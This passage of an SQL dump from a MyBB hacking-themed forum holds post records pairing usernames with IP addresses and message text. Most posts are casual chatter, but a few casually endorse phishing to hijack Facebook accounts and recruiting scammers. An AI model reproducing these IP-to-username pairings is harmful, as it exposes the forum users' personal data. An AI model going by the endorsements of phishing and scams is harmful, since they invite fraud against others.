'2200f81d636a48071b0b485a00d4dca4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6614', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '228', 'VirtualLegend', '1351536600', 'This is F*cking Awesome THANKS BRO', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'daa6c43e23b91f3d6585527d1d965302', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6615', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '257', 'XxTREYZxX', '1351536738', 'I dont know which lone to choose [hr] Got it all sorted, thanks mate i dont know if it worked', '101.168.85.85', '1705530709', '1', '0', '257', '1351537638', '1', '7f530967acff759db77d18883a9296b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6596', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '228', 'VirtualLegend', '1351530834', 'Welcome to l33thacking bro I Hope that you will like it here, stay active and HQ Have a nice stay', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f6840146adee7169461df1b3ab686e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6597', '1136', '0', '47', 'C++ Tutorial Givaway', '0', '302', 'Mac Miller', '1351530887', '[align=center]This Ebook will help you learn C++ with ease and i decided i could give it away here. Download link: www.mediafire.com/?9brcaodub9anoa9 Enjoy[/align]', '208.67.117.50', '-800885454', '0', '0', '302', '1351540401', '1', '930d32d5388e24ca8b99f3cc4d0a2c5b', '0', '1351540401'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6630', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '302', 'Mac Miller', '1351540778', 'There is o way to get unlimited Skype Premium and this doesn\'t look like the method i used to get 7 days of free premium.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', 'c28b026149a84012ed838f5ca2ebe991', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6617', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '257', 'XxTREYZxX', '1351537712', 'Welcome and enjoy your stay :) stay active and HQ', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '1b13ac25b9303a8232cfb5a03887a77e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6618', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '257', 'XxTREYZxX', '1351537825', 'Yeah i drink loads of cans when i stay at a mates house :)', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '8f1ff605e50cae4c0335ae129937420b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6599', '1126', '6543', '42', 'RE: Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '302', 'Mac Miller', '1351531211', 'Well when you a young billonaire like Mark you want to own everything else that could ever compete or help you out in the long run.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '18594e6fc21b8fbfb2c83c19f88e772b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6600', '1136', '6597', '47', 'RE: C++ Tutorial Givaway', '0', '228', 'VirtualLegend', '1351531307', '1. I have to make it clear, but l33thacking isn\'t a post and i will pm you forum. We are different than HF or other forums that does this. 2. You need to provide more information on your thread. Like how many pages, maybe a picture of the ebook stuff like that So just put the download link in the thread', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0c4aae74e1fa6ae8d25e45aee9497d4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6601', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '302', 'Mac Miller', '1351531327', 'I want one idc what you do with it just make it good!!! :D', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '130f852e79af4c3e4ad260592330d0d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6602', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1351531420', 'Lmao how can this thread has 505 views xD', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5c7a717cb100220aac65694bad562ea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6619', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '257', 'XxTREYZxX', '1351538067', 'Or just work hard and study like virtual legend said :l', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '81a290af61382c587fea05685d80428b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6620', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '257', 'XxTREYZxX', '1351538191', 'Thanks for this, even though i already knew on how to do this :)', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '9dc7da230cf2357968372f315d50b9c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6604', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '53', 'sirchamp', '1351532783', 'No Dont ban Monster Energy. Its the only energy drink which keeps me awake for the whole day. (I cant even sleep at night after I drunk a 0.5l can in the morning.', '76.34.104.196', '1277323460', '1', '0', '0', '0', '1', '3b699f66bc65a4ae7419662b30e7df2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6621', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '257', 'XxTREYZxX', '1351538278', 'Thanks alot for this mate,might be needing this in the future.', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '90e25e2ab7cf8dbf4fa11394505ee632', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6622', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351538636', 'When are we going to make the server for LH.', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '5580955a87f74cc1ce461e4c57334cce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6623', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351539633', '3/10 Kinda common upon other forums.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40cf7e2ad8a3fc59691666a672dcd81a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6624', '1134', '6584', '35', 'RE: My new pet', '0', '82', 'iTzIpod', '1351539730', 'It\'s alright :p Could add more detail too it or something. But oh well.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb6066023725a73f978e8e41e59c7516', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6625', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1351539781', 'I don\'t know VirtualLegend will be making any of these for anyone. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9459f5d4705dc9673622bea4d10ca29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6607', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '61', 'NXK', '1351533130', 'Welcome, Hope you enjoy it here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'b420c4b127eee3492e10e323f4fbab94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6626', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351539896', 'Can you tell me what you meant by \"I called and texted a number.\"? Because I can\'t seem to do that. Also, misleading title. It\'s not unlimited Skype Premium.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd440ebcff7017a31a745a2f08def4847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6627', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351540016', 'Just go on the thread page, and then refresh it 24/7. :p It increases the views on the thread. Also, on the new thread design, you spelled \'Process\' wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89f552f79c1743f3451f5a4c23804387', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6628', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351540132', 'Depends on how busy the members are..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '209a4ee44266062ab4256011f67d27bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6629', '1136', '6600', '47', 'RE: C++ Tutorial Givaway', '0', '302', 'Mac Miller', '1351540260', '[quote=\'VirtualLegend\' pid=\'6600\' dateline=\'1351531307\'] 1. I have to make it clear, but l33thacking isn\'t a post and i will pm you forum. We are different than HF or other forums that does this. 2. You need to provide more information on your thread. Like how many pages, maybe a picture of the ebook stuff like that So just put the download link in the thread [/quote] Sorry for givaway stuff im stuck on doig it like HF cause that is all i do there. sorry. :embarrased:', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '478cb8fb7da95657e39708316f84bb3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6610', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '228', 'VirtualLegend', '1351534341', 'That Almost happend to me, but i surived the comma. I drank 5 cans :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dbbdd095a1d836d9e920de6cdbd473b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6611', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '62', 'R?????zo?', '1351534536', 'Nice, I think it actually worked for me :) thanks bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c04ab7539ec8be160e705b36c66af5be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6631', '1118', '6627', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351540830', '[quote=\'iTzIpod\' pid=\'6627\' dateline=\'1351540016\'] Just go on the thread page, and then refresh it 24/7. :p It increases the views on the thread. Also, on the new thread design, you spelled \'Process\' wrong. [/quote] I didnt make the threaddesign. I really love the threaddesign. The grammatical errors dont matter as long as its understandable :D', '81.117.49.105', '1366634857', '1', '0', '0', '0', '1', '233cf6b8d7eb4f8f2360f4212db29b72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6632', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '302', 'Mac Miller', '1351540913', 'This is cool if i didn\'t post on youtube or didn\'t have an account i would use it.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '155c6d6973a2407e3c536a101b5b1a88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6633', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351541260', 'This isn\'t Free Premium. It\'s just a feature that allows you to Share Screen with others and call with others in a group chat or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79db0c24b67d6a6319fc39ab0caeef82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6634', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '82', 'iTzIpod', '1351541340', 'Oo. That\'s a really cool technique! Thanks for sharing!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c35d34444343ce15db99f9fa64f78c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6635', '1137', '0', '59', '[Ebook]Make $50+ a day usuing AdSense', '0', '302', 'Mac Miller', '1351541469', '[align=center]This Ebook tells you how to make a easy quick $50 you have to be dedicated if you really want $50. Download Link: http://www.mediafire.com/?r3gzweypwbuy4j5[/align]', '208.67.117.50', '-800885454', '0', '0', '302', '1351541487', '1', 'a6a739b34f0dacb6b11971300262905e', '0', '1351541487'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6636', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '67', 'HoverCatz', '1351541586', 'This is free Premium. It says my account is Premium on www.skype.com', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'b26ffc0528250d2c693c098e72a41cc4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6637', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '67', 'HoverCatz', '1351541945', '[b]Username:[/b] HoverCatz [b]Age:[/b] 17 [b]Is your English spelling/grammar good?: [/b] Very good [b]How many Experience do you have with making money online?:[/b] Legal Ebay scam, Plugin developer (Earns ALOT) [b]What for methods do you use?:[/b] Ebay, Java (Eclipse) [b]Do you succeed more than you fail, or not?:[/b] Yes. [b]Explain Why you want to join the group:[/b] We need more scammers online. [b]Profile Link:[/b] http://l33thacking.net/user-67.html', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'dcc979eda51f81c9ce0cccf7cab66d58', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6638', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1351548818', 'Vouch for Sirchamp 100% Trusted [img]http://i.imgur.com/Z1mrB.png[/img] It was really Quick done You must do this guaranteed fast money + you will make alot of profit :D Thanks Sirchamp', '83.83.167.183', '1397991351', '1', '0', '228', '1351548926', '1', '8d2b4d56475b4a20d76cc7b956563649', '0', '1351548926'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6639', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1351549090', 'I\'m busy ATM, so people need to wait a little while longer Sorry Guys :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '285cbb856f151a731c20117a3bb6ea6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6640', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351549156', 'Welcome HoverCatz, I Hope that i will learn a bit of ebay from you. :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '098e099e95492c05e90fbb1bbe276dda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6641', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351549267', '10/10 Cuz Pokemon was and still is awesome :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cb6fc81f6c29e9e24574a252d39b2235', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6642', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '304', 'anonymous_sam', '1351549369', 'well said phishing site\'s are the easiest way,.', '109.63.12.49', '1832848433', '0', '0', '0', '0', '1', 'd1fb1dcca9f0cacfeee8750be0e3eb47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6643', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351550507', '20/10. I love monkeys bro :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b80275bb3cc1a2fde8f4697116d778fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6644', '1138', '0', '42', 'Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351552988', 'This thread will contain live links to news channels, discussions on how the situation is around your area and other rumors. No shit posts such as i wish i was there etc. [b]Recommended Link:[/b] http://www.youtube.com/watch?v=yXMU2qwCVag&feature=g-sptl&cid=inp-hs-san [b]Other News Videos/Channels[/b] Sky view as Sandy arrives : http://www.youtube.com/watch?v=bGSJ8t0fANQ&feature=BFa&list=PL6cGNLMeqsHCs2l0c4cQfpShMdimzx1l7 Along East Coast: http://www.youtube.com/watch?v=4CZKgH3bLNE&feature=g-sptl&cid=inp-hs-san Obama speaks about sandy: http://www.youtube.com/watch?v=B6oAY1TbmhU&feature=g-sptl&cid=inp-hs-san [b]Evacuations[/b] - Manhattan - New Jersey [b]Other updates[/b] - New York has heavy rain and wind, Manhattan has already been hit badly. - Crane collaspes in Manhattan. (http://www.youtube.com/watch?v=XI7UHdc0NrQ&feature=fvcro&list=PL6cGNLMeqsHCs2l0c4cQfpShMdimzx1l7) - West Virgina has heavy snow - NJ has a flood - NY has a strong wind pressure and people are literally flying in the air. - No electricity in Manhattan. - Warwick is going to get a flood. [b]New[/b] - Delaware completely flooded. - 13.5 feet flood in NYC - Hurricane Sandy has knocked down over 70% trees all over the hurricane has been through. - Dish blew off in NYC news reporters cars. - Way too many power outages, 3 million customers and counting. - Subways flooded, to be closed down for a week in NY. Post other updates below', '72.231.24.165', '1223104677', '0', '0', '8', '1351565840', '1', '5a3f8796784b5f544a09b9087456a8b9', '0', '1351565840'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6645', '1102', '6564', '69', 'RE: What kinds of programs have you coded before', '0', '262', 'RAND0M1ZER', '1351553941', '[quote=\'Apathy\' pid=\'6564\' dateline=\'1351471896\'] I made calculators, for the most part I pay someone to code me whatever I want. :P [/quote] At least he\'s honest! :P I\'ve done a lot of programs for school in C/C++ and Java but mostly I\'ve done a lot of web programming.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '599a21fbb6a58f7848454d86e57bb270', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6646', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '302', 'Mac Miller', '1351555879', 'Cool nice i hate when my battery runs out quick now i can make it live way longer.', '184.38.77.152', '-1205449320', '0', '0', '0', '0', '1', '9f256c0e0698db94193df4a684bcaea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6647', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '302', 'Mac Miller', '1351556166', 'Doesn\'t work on latest version actually does for like 5-10 seconds then give you \"the glitch achievement\" nevertheless good tut.', '184.38.77.152', '-1205449320', '0', '0', '0', '0', '1', 'a5ab84a360edbf945a2e310759f0868b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6648', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1351558075', 'Oh. I see they updated it now. :p Yay I get an achievement! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7c726b5bb14c5370285add8daf41b27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6649', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '82', 'iTzIpod', '1351558221', 'I\'m really curious on what will it be tonight and tomorrow. :o I find that reading this guy\'s tweets on Twitter is actually quite amusing. :p @SandysHurricane :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12f934e176e8e7ca1f70d65a64902344', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6650', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '257', 'XxTREYZxX', '1351559246', 'Man i hope you guys live good luck boys', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '15255700f5e6bed4ff20e2c9f694610b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6651', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '257', 